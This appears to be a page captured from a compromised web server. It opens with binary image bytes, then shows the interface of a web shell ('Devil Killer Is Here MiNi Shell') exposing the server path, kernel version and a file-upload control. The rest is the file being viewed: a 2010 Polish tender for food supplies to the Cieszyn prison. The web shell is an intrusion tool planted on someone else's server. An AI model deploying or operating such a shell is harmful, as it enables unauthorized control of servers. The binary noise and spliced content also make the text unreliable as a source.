JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101123/333263-N-2010.html

<p class="kh_header"><b>Cieszyn: Sukcesywna dostawa różnych produktów spożywczych dla potrzeb Zakładu Karnego w Cieszynie</b><br>
<b>Numer ogłoszenia: 333263 - 2010; data zamieszczenia: 23.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Cieszynie , ul. Chrobrego 2, 43-400 Cieszyn, woj. śląskie, tel. 033 8513220, 8513270, faks 033 8511755.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl/pl/okregowy-inspektorat-sluzby-wieziennej-katowice/zaklad-karny-cieszyn</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa różnych produktów spożywczych dla potrzeb Zakładu Karnego w Cieszynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia publicznego jest dostawa różnych produktów spożywczych - wg Wspólnego Słownika Zamówień główny przedmiot: kod CPV 15000000 - żywność, napoje tytoń i produkty pokrewne.
Zamawiający dopuszcza możliwość składania ofert częściowych w następującym asortymencie i ilościach:

A.	Część I

Kod CPV - 158 00000-6 Różne produkty spożywcze. 


L.p.	Nazwa	j.m.	Ilość
1.	Makaron niegotowany	kg.	2900,00
2.	Woda mineralna 1,5l.	litr	3300,00
3.	Barszcz biały w proszku	kg.	150,00
4.	Żurek w proszku	kg.	150,00
5.	Pieczarkowa w proszku	kg.	150,00
6.	Ogonowa w proszku	kg.	150,00
7.	Majonez	kg.	50,00
8.	Musztarda 	kg.	500,00
9.	Cukier 	kg.	8000,00
10.	Cukier kostka	kg.	10,00
11.	Miód sztuczny	kg.	100,00
12.	Kawa zbożowa	kg.	300,00
13.	Sól spożywcza	kg.	2500,00
14.	Herbata	kg.	400,00
15.	Herbata ex.	kg.	3,00
16.	Maggi	litr	1300,00
17.	Bulion w proszku	kg.	100,00
18.	Przyprawa Jarzynka 	kg.	100,00
19.	Ocet	litr	150,00
20.	Kwasek cytrynowy	kg.	20,00
21.	Pieprz ziołowy	kg.	130,00
22.	Papryka słodka	kg.	40,00
23.	Majeranek	kg.	50,00
24.	Kminek	kg.	12,00
25.	Liść laurowy	kg.	12,00
26.	Ziele angielskie	kg.	12,00
27.	Cukier wanilinowy	kg.	3,00
28.	Cynamon 	kg.	5,00
29.	Syrop owocowy	litr	200,00



SYROP OWOCOWY
Skład: cukier i/lub syrop fruktozowo - glukozowy, woda, zagęszczony sok owocowy, kwas cytrynowy, regulator kwasowości, aromat E 150 d, barwnik( sorbinian potasu i benzoesan sodu ), substancje konserwujące, opakowanie do 5ltr/sztuka

MAKARON NIEGOTOWANY
Skład: semolina, jaja, mąka, woda, różne rodzaje ( nitki, świderki, kolanka), opakowanie od 5 do 10kg/sztuka

ŻUREK
Skład: mąka żytnia, mąka ryżowa, sól, tłuszcz roślinny, cukier, cebula, przyprawy, regulator kwasowości - kwasek cytrynowy, maltodekstyna, aromat, opakowanie do 10 kg/sztuka

ZUPA OGONOWA
Skład: mąka pszenna, skrobia ziemniaczana, sól, proszek pomidorowy ( 6 % ), cukier, substancje wzmacniające smak i zapach ( glutaminian sodu ), sojowy hydrolizat białkowy, warzywa suszone ( 1,5 %), suszony ekstrakt drożdżowy, przyprawy, aromat, regulator kwasowości - kwas cytrynowy, barwnik ( karmel E 150 c), pietruszka liść susz, opakowanie do 10kg/sztuka

BARSZCZ BIAŁY
Skład: mąka pszenna ( 46 % ), mąka żytnia ( 15 % ), sól, mleko odtłuszczone w proszku
( 10 % ), cebula susz ( 3 % ), substancja wzmacniająca smak i zapach E 621, regulator kwasowości E 330, czosnek ( 2 % ), przyprawy, opakowanie do 10 kg/sztuka

ZUPA PIECZARKOWA
Skład: mąka pszenna, skrobia ziemniaczana, maltodekstryna, tłuszcz roślinny utwardzony,
cukier, laktoza, substancja wzmacniająca smak i aromat - glutaminian sodu, pieczarka płatek ( 1 % ), cebula suszona, białka mleka, suszony koncentrat pieczarkowy ( 0,5 % ), aromat, 
barwnik - karmel E 150 c, opakowanie do 10kg/sztuka

MAJONEZ
Skład: olej roślinny, żółtka jaj, woda, ocet, cukier, musztarda, sól, 80% tłuszczu.
opakowanie do 1kg/sztuka
MUSZTARDA
Skład: gorczyca, woda, ocet, cukier, sól, przyprawy, aromaty smakowe
opakowanie od 0.9 do1,5kg/sztuka 
MIÓD SZTUCZNY
Skład: cukier, woda, regulator kwasowości, kwasek cytrynowy, aromat miodowy,
Opakowanie jednostkowe od 380 do 410g/sztuka
KAWA ZBOŻOWA
Skład: żyto, jęczmień, cykoria, burak, opakowanie od 1do 10kg/sztuka

PRZYPRAWA W PŁYNIE
Skład: woda, hydrolizatory białkowe, ekstrakty drożdżowe, sól, ocet, cukier, karmel, naturalne dodatki smakowe, substancja wzmacniająca smak i zapach E 621, E 635,
opakowanie od 1do 3ltr/szuka 

OCET
Skład: ocet spirytusowy retyfikowany 10 %, opakowanie od 0.5 do 1ltr/sztuka

ROSÓŁ - BULION
Skład: sól, maltodekstryna, skrobia ziemniaczana, cukier, substancja wzmacniająca smak 
i zapach - glutaminian sodu, tłuszcz roślinny utwardzony, warzywa suszone 2,5 %,
barwnik E 100 aromat 0,3 %, pakowane od 1do 5 kg/sztuka

PRZYPRAWA DO POTRAW JARZYNKA
Skład: sól, warzywa suszone ( 15 % ), cukier, substancja wzmacniająca smak i zapach - glutaminian sodu, skrobia kukurydziana, barwnik - ryboflawina , pakowane od 1do 3 kg/sztuka

CUKIER-  PN-A-74850- pakowane od 1 do 30 kg/sztuka

HERBATA GRANULOWANA- PN-ISO 3720- pakowane do 30 kg/sztuka

PIEPRZ ZIOŁOWY- PN-A-86952- pakowane od 1do 5kg/sztuka

KWASEK CYTRYNOWY- PN-81/A-79734- pakowane do 1kg/sztuka

MAJERANEK- PN-A-86958- pakowane do 1kg/sztuka

KMINEK- PN-A-86953- pakowane do 1kg/sztuka

PAPRYKA SŁODKA- PN-A-86955- pakowane do 1kg/sztuka

SÓL SPOŻYWCZA-pakowana do 25kg

CYNAMON- pakowany od 0.5 do 1 kg/sztuka

LIŚĆ LAUROWY- pakowany od 0,5 do 2kg/sztuka

ZIELE ANGIELSKIE -pakowane od 0,5 do 1 kg/sztuka

CUKIER WANILIOWY- pakowany od 0,1 do 1 kg/sztuka

HERBATA EKSPRESOWA- pakowana od 100 do 1000sztuk paczka 

CUKIER KOSTKA- 	opakowanie jednostkowe 1 kg

WODA MINERALNA NIEGAZOWANA- opakowanie jednostkowe 1,5litra/sztuka


Towar dostarczany będzie zamawiającemu do  godz.11 00  w dniu ustalonej dostawy według cen zgodnych z zawartą umową.
Częstotliwość realizacji dostaw: 1 raz w miesiącu. Podana ilość asortymentów jest szacunkowa i może ulec zmianie. Z tego powodu wykonawcy nie będą przysługiwały żadne roszczenia wobec zamawiającego.
Minimalny okres przydatności do spożycia dla poszczególnych asortymentów towaru powinien wynosić 30 dni od dnia dostawy.



B.	Część II

Kod CPV- 15331150-3 Przetworzone jadalne części warzyw strączkowych.





L.p.	Nazwa	j.m.	Ilość
1.	Granulat sojowy	kg.	200,00
2.	Kostka sojowa	Kg.	450,00
3.	Kotlet sojowy	kg.	50,00



GRANULAT SOJOWY -opakowanie do 15 kg

KOSTKA SOJOWA - opakowanie do 15 kg

KOTLET SOJOWY - opakowanie do 20 kg


Towar dostarczany będzie zamawiającemu do godz.11 00 w dniu ustalonej dostawy według cen zgodnych z zawartą umową.
Częstotliwość realizacji dostaw: 1 raz w miesiącu. Podana ilość asortymentów jest szacunkowa i może ulec zmianie. Z tego powodu wykonawcy nie będą przysługiwały żadne roszczenia wobec zamawiającego.
Minimalny okres przydatności do spożycia powinien wynosić 30 dni od dnia dostawy.


C.	Część III

Kod CPV - 15600000-4 Produkty przemiału ziarna, skrobi i produktów skrobiowych.

L.p.	Nazwa	j.m.	Ilość
1.	Mąka	kg.	3300,00
2.	Kasza manna	Kg.	600,00
3.	Kasza pęczak	kg.	700,00
4.	Kasza mazurska	kg.	2000,00
5.	Kasza kukurydziana	kg.	450,00
6.	Płatki Owsiane	kg.	400,00
7.	Ryż	kg.	3500,00
8.	Mąka ziemniaczana	kg.	100,00


MĄKA pszenna typ 500 PN-A-74022              opakowanie do 30 kg

KASZA MANNA  PN-88/A-74036                 opakowanie do 30kg

KASZA PĘCZAK  PN-A-74202                      opakowanie do 30kg

KASZA MAZURSKA średnia PN-87/A-74203 opakowanie do 30 kg

KASZA KUKURYDZIANA    PN-A-74205   opakowanie do 30 kg

PŁATKI OWSIANE  PN-82/A-74037               opakowanie do 30 kg

RYŻ ŁUSKANY PN-ISO 7301                         opakowanie do 30 kg

MĄKA ZIEMNIACZANA PN-93/A-74710      opakowanie do   2 kg

Towar dostarczany będzie zamawiającemu do  godz.11 00  w dniu ustalonej dostawy według cen zgodnych z zawartą umową.
Częstotliwość realizacji dostaw: 1 raz w miesiącu  Podana ilość asortymentów jest szacunkowa i może ulec zmianie. Z tego powodu wykonawcy nie będą przysługiwały żadne roszczenia wobec zamawiającego.
Minimalny okres przydatności do spożycia powinien wynosić 30 dni od dnia dostawy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 15.33.11.50-3, 15.60.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna złożone oświadczenie, w załączniku nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna złożone oświadczenie, w załączniku nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna złożone oświadczenie, w załączniku nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna złożone oświadczenie, w załączniku nr 4 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany w umowie w zakresie:
1.	osób powołanych do reprezentacji stron. Zmiana ta wymaga pisemnego oświadczenia Wykonawcy lub Zamawiającego.
2.	wynikającym z zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.sw.gov.pl/pl/okregowy-inspektorat-sluzby-wieziennej-katowice/zaklad-karny-cieszyn<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Cieszynie, ul. B. Chrobrego 2, 43-400 Cieszyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2010 godzina 09:00, miejsce: sekretariat Zakładu Karnego w Cieszynie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> część I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kod CPV - 158 00000-6 Różne produkty spożywcze. 


L.p.	Nazwa	j.m.	Ilość
1.	Makaron niegotowany	kg.	2900,00
2.	Woda mineralna 1,5l.	litr	3300,00
3.	Barszcz biały w proszku	kg.	150,00
4.	Żurek w proszku	kg.	150,00
5.	Pieczarkowa w proszku	kg.	150,00
6.	Ogonowa w proszku	kg.	150,00
7.	Majonez	kg.	50,00
8.	Musztarda 	kg.	500,00
9.	Cukier 	kg.	8000,00
10.	Cukier kostka	kg.	10,00
11.	Miód sztuczny	kg.	100,00
12.	Kawa zbożowa	kg.	300,00
13.	Sól spożywcza	kg.	2500,00
14.	Herbata	kg.	400,00
15.	Herbata ex.	kg.	3,00
16.	Maggi	litr	1300,00
17.	Bulion w proszku	kg.	100,00
18.	Przyprawa Jarzynka 	kg.	100,00
19.	Ocet	litr	150,00
20.	Kwasek cytrynowy	kg.	20,00
21.	Pieprz ziołowy	kg.	130,00
22.	Papryka słodka	kg.	40,00
23.	Majeranek	kg.	50,00
24.	Kminek	kg.	12,00
25.	Liść laurowy	kg.	12,00
26.	Ziele angielskie	kg.	12,00
27.	Cukier wanilinowy	kg.	3,00
28.	Cynamon 	kg.	5,00
29.	Syrop owocowy	litr	200,00



SYROP OWOCOWY
Skład: cukier i/lub syrop fruktozowo - glukozowy, woda, zagęszczony sok owocowy, kwas cytrynowy, regulator kwasowości, aromat E 150 d, barwnik( sorbinian potasu i benzoesan sodu ), substancje konserwujące, opakowanie do 5ltr/sztuka

MAKARON NIEGOTOWANY
Skład: semolina, jaja, mąka, woda, różne rodzaje ( nitki, świderki, kolanka), opakowanie od 5 do 10kg/sztuka

ŻUREK
Skład: mąka żytnia, mąka ryżowa, sól, tłuszcz roślinny, cukier, cebula, przyprawy, regulator kwasowości - kwasek cytrynowy, maltodekstyna, aromat, opakowanie do 10 kg/sztuka

ZUPA OGONOWA
Skład: mąka pszenna, skrobia ziemniaczana, sól, proszek pomidorowy ( 6 % ), cukier, substancje wzmacniające smak i zapach ( glutaminian sodu ), sojowy hydrolizat białkowy, warzywa suszone ( 1,5 %), suszony ekstrakt drożdżowy, przyprawy, aromat, regulator kwasowości - kwas cytrynowy, barwnik ( karmel E 150 c), pietruszka liść susz, opakowanie do 10kg/sztuka

BARSZCZ BIAŁY
Skład: mąka pszenna ( 46 % ), mąka żytnia ( 15 % ), sól, mleko odtłuszczone w proszku
( 10 % ), cebula susz ( 3 % ), substancja wzmacniająca smak i zapach E 621, regulator kwasowości E 330, czosnek ( 2 % ), przyprawy, opakowanie do 10 kg/sztuka

ZUPA PIECZARKOWA
Skład: mąka pszenna, skrobia ziemniaczana, maltodekstryna, tłuszcz roślinny utwardzony,
cukier, laktoza, substancja wzmacniająca smak i aromat - glutaminian sodu, pieczarka płatek ( 1 % ), cebula suszona, białka mleka, suszony koncentrat pieczarkowy ( 0,5 % ), aromat, 
barwnik - karmel E 150 c, opakowanie do 10kg/sztuka

MAJONEZ
Skład: olej roślinny, żółtka jaj, woda, ocet, cukier, musztarda, sól, 80% tłuszczu.
opakowanie do 1kg/sztuka
MUSZTARDA
Skład: gorczyca, woda, ocet, cukier, sól, przyprawy, aromaty smakowe
opakowanie od 0.9 do1,5kg/sztuka 
MIÓD SZTUCZNY
Skład: cukier, woda, regulator kwasowości, kwasek cytrynowy, aromat miodowy,
Opakowanie jednostkowe od 380 do 410g/sztuka
KAWA ZBOŻOWA
Skład: żyto, jęczmień, cykoria, burak, opakowanie od 1do 10kg/sztuka

PRZYPRAWA W PŁYNIE
Skład: woda, hydrolizatory białkowe, ekstrakty drożdżowe, sól, ocet, cukier, karmel, naturalne dodatki smakowe, substancja wzmacniająca smak i zapach E 621, E 635,
opakowanie od 1do 3ltr/szuka 

OCET
Skład: ocet spirytusowy retyfikowany 10 %, opakowanie od 0.5 do 1ltr/sztuka

ROSÓŁ - BULION
Skład: sól, maltodekstryna, skrobia ziemniaczana, cukier, substancja wzmacniająca smak 
i zapach - glutaminian sodu, tłuszcz roślinny utwardzony, warzywa suszone 2,5 %,
barwnik E 100 aromat 0,3 %, pakowane od 1do 5 kg/sztuka

PRZYPRAWA DO POTRAW JARZYNKA
Skład: sól, warzywa suszone ( 15 % ), cukier, substancja wzmacniająca smak i zapach - glutaminian sodu, skrobia kukurydziana, barwnik - ryboflawina , pakowane od 1do 3 kg/sztuka

CUKIER-  PN-A-74850- pakowane od 1 do 30 kg/sztuka

HERBATA GRANULOWANA- PN-ISO 3720- pakowane do 30 kg/sztuka

PIEPRZ ZIOŁOWY- PN-A-86952- pakowane od 1do 5kg/sztuka

KWASEK CYTRYNOWY- PN-81/A-79734- pakowane do 1kg/sztuka

MAJERANEK- PN-A-86958- pakowane do 1kg/sztuka

KMINEK- PN-A-86953- pakowane do 1kg/sztuka

PAPRYKA SŁODKA- PN-A-86955- pakowane do 1kg/sztuka

SÓL SPOŻYWCZA-pakowana do 25kg

CYNAMON- pakowany od 0.5 do 1 kg/sztuka

LIŚĆ LAUROWY- pakowany od 0,5 do 2kg/sztuka

ZIELE ANGIELSKIE -pakowane od 0,5 do 1 kg/sztuka

CUKIER WANILIOWY- pakowany od 0,1 do 1 kg/sztuka

HERBATA EKSPRESOWA- pakowana od 100 do 1000sztuk paczka 

CUKIER KOSTKA- 	opakowanie jednostkowe 1 kg

WODA MINERALNA NIEGAZOWANA- opakowanie jednostkowe 1,5litra/sztuka


Towar dostarczany będzie zamawiającemu do  godz.11 00  w dniu ustalonej dostawy według cen zgodnych z zawartą umową.
Częstotliwość realizacji dostaw: 1 raz w miesiącu. Podana ilość asortymentów jest szacunkowa i może ulec zmianie. Z tego powodu wykonawcy nie będą przysługiwały żadne roszczenia wobec zamawiającego.
Minimalny okres przydatności do spożycia dla poszczególnych asortymentów towaru powinien wynosić 30 dni od dnia dostawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> część II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kod CPV- 15331150-3 Przetworzone jadalne części warzyw strączkowych.





L.p.	Nazwa	j.m.	Ilość
1.	Granulat sojowy	kg.	200,00
2.	Kostka sojowa	Kg.	450,00
3.	Kotlet sojowy	kg.	50,00



GRANULAT SOJOWY -opakowanie do 15 kg

KOSTKA SOJOWA - opakowanie do 15 kg

KOTLET SOJOWY - opakowanie do 20 kg


Towar dostarczany będzie zamawiającemu do godz.11 00 w dniu ustalonej dostawy według cen zgodnych z zawartą umową.
